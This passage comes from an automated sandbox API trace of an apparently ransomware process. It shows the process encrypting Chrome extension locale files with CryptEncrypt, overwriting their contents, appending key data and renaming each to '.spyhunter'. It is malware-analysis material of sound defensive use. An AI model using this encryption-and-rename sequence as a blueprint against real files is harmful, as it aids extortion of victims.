pdwDataLen=0x57f5d0*=0x30) returned 1 [0135.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0135.397] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json") returned 157 [0135.397] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.397] GetProcessHeap () returned 0x2c0000 [0135.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0135.397] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f594, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f594*=0xb3, lpOverlapped=0x0) returned 1 [0135.400] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.400] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x57f594, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f594*=0xb3, lpOverlapped=0x0) returned 1 [0135.401] GetProcessHeap () returned 0x2c0000 [0135.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0135.401] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.401] WriteFile (in: hFile=0xec, lpBuffer=0x57f5d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f594, lpOverlapped=0x0 | out: lpBuffer=0x57f5d4*, lpNumberOfBytesWritten=0x57f594*=0x4, lpOverlapped=0x0) returned 1 [0135.401] WriteFile (in: hFile=0xec, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f594, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f594*=0x30, lpOverlapped=0x0) returned 1 [0135.401] CloseHandle (hObject=0xec) returned 1 [0135.401] GetProcessHeap () returned 0x2c0000 [0135.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.401] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.spyhunter") returned 167 [0135.401] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.spyhunter")) returned 1 [0135.402] GetProcessHeap () returned 0x2c0000 [0135.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.403] GetProcessHeap () returned 0x2c0000 [0135.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0135.403] GetProcessHeap () returned 0x2c0000 [0135.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7fbc8 | out: hHeap=0x2c0000) returned 1 [0135.404] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f5d0 | out: pbBuffer=0x57f5d0) returned 1 [0135.404] GetProcessHeap () returned 0x2c0000 [0135.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0135.404] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f5c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f5c8*=0x30) returned 1 [0135.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0135.405] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json") returned 157 [0135.405] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.405] GetProcessHeap () returned 0x2c0000 [0135.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0135.405] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f58c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f58c*=0xb3, lpOverlapped=0x0) returned 1 [0135.406] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.406] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x57f58c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f58c*=0xb3, lpOverlapped=0x0) returned 1 [0135.406] GetProcessHeap () returned 0x2c0000 [0135.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0135.406] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.406] WriteFile (in: hFile=0xec, lpBuffer=0x57f5cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f58c, lpOverlapped=0x0 | out: lpBuffer=0x57f5cc*, lpNumberOfBytesWritten=0x57f58c*=0x4, lpOverlapped=0x0) returned 1 [0135.407] WriteFile (in: hFile=0xec, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f58c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f58c*=0x30, lpOverlapped=0x0) returned 1 [0135.407] CloseHandle (hObject=0xec) returned 1 [0135.407] GetProcessHeap () returned 0x2c0000 [0135.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.407] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.spyhunter") returned 167 [0135.407] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.spyhunter")) returned 1 [0135.408] GetProcessHeap () returned 0x2c0000 [0135.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.408] GetProcessHeap () returned 0x2c0000 [0135.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0135.408] GetProcessHeap () returned 0x2c0000 [0135.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7fa40 | out: hHeap=0x2c0000) returned 1 [0135.410] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f5c8 | out: pbBuffer=0x57f5c8) returned 1 [0135.410] GetProcessHeap () returned 0x2c0000 [0135.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0135.410] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f5c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f5c0*=0x30) returned 1 [0135.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0135.410] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json") returned 157 [0135.410] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.410] GetProcessHeap () returned 0x2c0000 [0135.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0135.410] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f584, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f584*=0xb3, lpOverlapped=0x0) returned 1 [0135.411] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.411] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x57f584, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f584*=0xb3, lpOverlapped=0x0) returned 1 [0135.412] GetProcessHeap () returned 0x2c0000 [0135.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0135.412] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.412] WriteFile (in: hFile=0xec, lpBuffer=0x57f5c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f584, lpOverlapped=0x0 | out: lpBuffer=0x57f5c4*, lpNumberOfBytesWritten=0x57f584*=0x4, lpOverlapped=0x0) returned 1 [0135.412] WriteFile (in: hFile=0xec, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f584, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f584*=0x30, lpOverlapped=0x0) returned 1 [0135.412] CloseHandle (hObject=0xec) returned 1 [0135.412] GetProcessHeap () returned 0x2c0000 [0135.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.412] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.spyhunter") returned 167 [0135.412] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.spyhunter")) returned 1 [0135.413] GetProcessHeap () returned 0x2c0000 [0135.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.413] GetProcessHeap () returned 0x2c0000 [0135.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0135.413] GetProcessHeap () returned 0x2c0000 [0135.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1bcc8 | out: hHeap=0x2c0000) returned 1 [0135.415] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f5c0 | out: pbBuffer=0x57f5c0) returned 1 [0135.415] GetProcessHeap () returned 0x2c0000 [0135.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0135.415] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f5b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f5b8*=0x30) returned 1 [0135.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0135.416] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json") returned 157 [0135.416] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.416] GetProcessHeap () returned 0x2c0000 [0135.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0135.416] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f57c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f57c*=0xb3, lpOverlapped=0x0) returned 1 [0135.417] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.417] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x57f57c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f57c*=0xb3, lpOverlapped=0x0) returned 1 [0135.417] GetProcessHeap () returned 0x2c0000 [0135.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0135.417] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.417] WriteFile (in: hFile=0xec, lpBuffer=0x57f5bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f57c, lpOverlapped=0x0 | out: lpBuffer=0x57f5bc*, lpNumberOfBytesWritten=0x57f57c*=0x4, lpOverlapped=0x0) returned 1 [0135.417] WriteFile (in: hFile=0xec, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f57c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f57c*=0x30, lpOverlapped=0x0) returned 1 [0135.417] CloseHandle (hObject=0xec) returned 1 [0135.418] GetProcessHeap () returned 0x2c0000 [0135.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.418] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.spyhunter") returned 167 [0135.418] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.spyhunter")) returned 1 [0135.419] GetProcessHeap () returned 0x2c0000 [0135.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.419] GetProcessHeap () returned 0x2c0000 [0135.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0135.419] GetProcessHeap () returned 0x2c0000 [0135.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82b18 | out: hHeap=0x2c0000) returned 1 [0135.420] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f5b8 | out: pbBuffer=0x57f5b8) returned 1 [0135.420] GetProcessHeap () returned 0x2c0000 [0135.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0135.420] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f5b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f5b0*=0x30) returned 1 [0135.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0135.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json") returned 157 [0135.506] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.506] GetProcessHeap () returned 0x2c0000 [0135.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0135.506] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f574, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f574*=0xb3, lpOverlapped=0x0) returned 1 [0135.507] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.507] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x57f574, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f574*=0xb3, lpOverlapped=0x0) returned 1 [0135.508] GetProcessHeap () returned 0x2c0000 [0135.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0135.508] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.508] WriteFile (in: hFile=0x188, lpBuffer=0x57f5b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f574, lpOverlapped=0x0 | out: lpBuffer=0x57f5b4*, lpNumberOfBytesWritten=0x57f574*=0x4, lpOverlapped=0x0) returned 1 [0135.508] WriteFile (in: hFile=0x188, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f574, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f574*=0x30, lpOverlapped=0x0) returned 1 [0135.508] CloseHandle (hObject=0x188) returned 1 [0135.508] GetProcessHeap () returned 0x2c0000 [0135.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.508] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.spyhunter") returned 167 [0135.508] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.spyhunter")) returned 1 [0135.509] GetProcessHeap () returned 0x2c0000 [0135.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.509] GetProcessHeap () returned 0x2c0000 [0135.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0135.510] GetProcessHeap () returned 0x2c0000 [0135.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82990 | out: hHeap=0x2c0000) returned 1 [0135.511] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f5b0 | out: pbBuffer=0x57f5b0) returned 1 [0135.511] GetProcessHeap () returned 0x2c0000 [0135.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0135.511] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f5a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f5a8*=0x30) returned 1 [0135.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0135.511] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json") returned 157 [0135.512] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.512] GetProcessHeap () returned 0x2c0000 [0135.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 